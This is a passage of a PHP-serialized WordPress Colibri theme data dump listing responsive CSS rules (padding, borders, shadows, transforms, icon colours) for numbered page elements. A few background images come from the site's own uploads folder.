5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-362 {\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-362 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(5%);\n}\n\";}i:363;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-363 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-363 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-363 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n}\n\";}i:364;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-364 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:366;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-366 ol {\n  list-style-type: decimal;\n}\n#colibri .style-366 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:367;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:368;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:369;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-369 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:370;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:371;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-371 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:372;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-372 ol {\n  list-style-type: decimal;\n}\n#colibri .style-372 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:377;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-377 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:378;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:379;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-379 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:380;a:3:{s:7:\"desktop\";s:151:\"#colibri .style-380 {\n  text-align: left;\n}\n#colibri .style-380 ol {\n  list-style-type: decimal;\n}\n#colibri .style-380 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:381;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-381 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:382;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-382 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:383;a:3:{s:7:\"desktop\";s:706:\"#colibri .style-383 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n}\n\";s:6:\"tablet\";s:154:\"#colibri .style-383 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:195:\"#colibri .style-383 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-left: 0%;\n}\n\";}i:384;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-384 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:386;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-386 ol {\n  list-style-type: decimal;\n}\n#colibri .style-386 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:387;a:3:{s:7:\"desktop\";s:843:\"#colibri .style-387 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Opherus.png\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-387 {\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-387 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(-5%);\n}\n\";}i:388;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-388 {\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:389;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-389 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:390;a:3:{s:7:\"desktop\";s:874:\"#colibri .style-390 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-position: 77.72398745397518% 53.316665364481594%;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/Picture1.jpg\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  z-index: 1;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-390 {\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-390 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(5%);\n}\n\";}i:391;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-391 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-391 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-391 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n}\n\";}i:392;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-392 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:394;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-394 ol {\n  list-style-type: decimal;\n}\n#colibri .style-394 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:395;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:396;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-396 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:397;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:398;a:3:{s:7:\"desktop\";s:165:\"#colibri .style-398 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  padding-top: 5%;\n  padding-right: 12%;\n  padding-bottom: 5%;\n  padding-left: 17%;\n}\n\";s:6:\"tablet\";s:66:\"#colibri .style-398 {\n  padding-right: 5%;\n  padding-left: 10%;\n}\n\";s:6:\"mobile\";s:136:\"#colibri .style-398 {\n  text-align: center;\n  padding-top: 15px;\n  padding-right: 15px;\n  padding-bottom: 15px;\n  padding-left: 15px;\n}\n\";}i:399;a:3:{s:7:\"desktop\";s:347:\"#colibri .style-399 p,#colibri .style-399  h1,#colibri .style-399  h2,#colibri .style-399  h3,#colibri .style-399  h4,#colibri .style-399  h5,#colibri .style-399  h6 {\n  text-transform: uppercase;\n}\n#colibri .style-399 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:400;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-400 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:401;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-401 ul {\n  list-style-type: disc;\n}\n#colibri .style-401 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:406;a:3:{s:7:\"desktop\";s:419:\"#colibri .style-406 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 20px 0px rgba(0, 0, 0, 0.2) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:45:\"#colibri .style-406 {\n  min-height: 400px;\n}\n\";}i:407;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:408;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-408 {\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:409;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:410;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-410 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:412;a:3:{s:7:\"desktop\";s:153:\"#colibri .style-412 {\n  text-align: center;\n}\n#colibri .style-412 ol {\n  list-style-type: decimal;\n}\n#colibri .style-412 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:413;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:417;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-417 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:418;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:419;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-419 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:420;a:3:{s:7:\"desktop\";s:259:\"#colibri .style-420 {\n  text-align: left;\n  font-style: normal;\n  font-size: 16px;\n}\n#colibri .style-420 p {\n  font-style: normal;\n  font-size: 16px;\n}\n#colibri .style-420 ul {\n  list-style-type: disc;\n}\n#colibri .style-420 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:421;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-421 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:422;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:423;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-423 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:440;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-440 {\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:441;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:442;a:3:{s:7:\"desktop\";s:264:\".style-442 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-442 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  box-shadow: 0px 1px 3px 1px rgba(0, 0, 0, 0.1) ;\n  background-color: #f6f8fa;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:443;a:3:{s:7:\"desktop\";s:1113:\"#colibri .style-443-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-443-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-443-caption {\n  margin-top: 10px;\n}\n#colibri .style-443-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:444;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:445;a:3:{s:7:\"desktop\";s:159:\".style-445 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 15px;\n}\n#colibri .style-445 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:446;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-446 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:447;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-447 ul {\n  list-style-type: disc;\n}\n#colibri .style-447 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:448;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-448 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-448 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-448 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-448 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:449;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-449 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-449 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-449 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-449 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:450;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-450 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-450 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-450 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-450 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:451;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-451 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-451 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-451 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-451 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:452;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:453;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-453 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:454;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-454 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:510;a:3:{s:7:\"desktop\";s:114:\"#colibri .style-510 {\n  height: auto;\n  min-height: unset;\n  background-color: unset;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:511;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:512;a:3:{s:7:\"desktop\";s:264:\".style-512 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-512 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  box-shadow: 0px 1px 3px 1px rgba(0, 0, 0, 0.1) ;\n  background-color: #f6f8fa;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:513;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-513-image {\n  opacity: 1;\n}\n#colibri .style-513-caption {\n  margin-top: 10px;\n}\n#colibri .style-513-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:514;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:515;a:3:{s:7:\"desktop\";s:159:\".style-515 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 15px;\n}\n#colibri .style-515 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:516;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-516 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:517;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-517 ul {\n  list-style-type: disc;\n}\n#colibri .style-517 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:518;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-518 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-518 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-518 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-518 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:519;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-519 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-519 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-519 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-519 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:520;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-520 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-520 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-520 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-520 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:521;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-521 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-521 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-521 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-521 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:522;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:523;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-523 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:524;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-524 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:605;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-605 {\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:606;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:607;a:3:{s:7:\"desktop\";s:800:\".style-607 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-607 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  box-shadow: none;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n  background-color: #f6f8fa;\n  background-image: none;\n}\n#colibri .style-607:hover {\n  box-shadow: 0px 1px 20px 2px rgba(0, 0, 0, 0.1) ;\n  transition-duration: 0.5s;\n  transform: translateY(-2px);\n  transform-origin: center center 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:608;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-608-image {\n  opacity: 1;\n}\n#colibri .style-608-caption {\n  margin-top: 10px;\n}\n#colibri .style-608-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 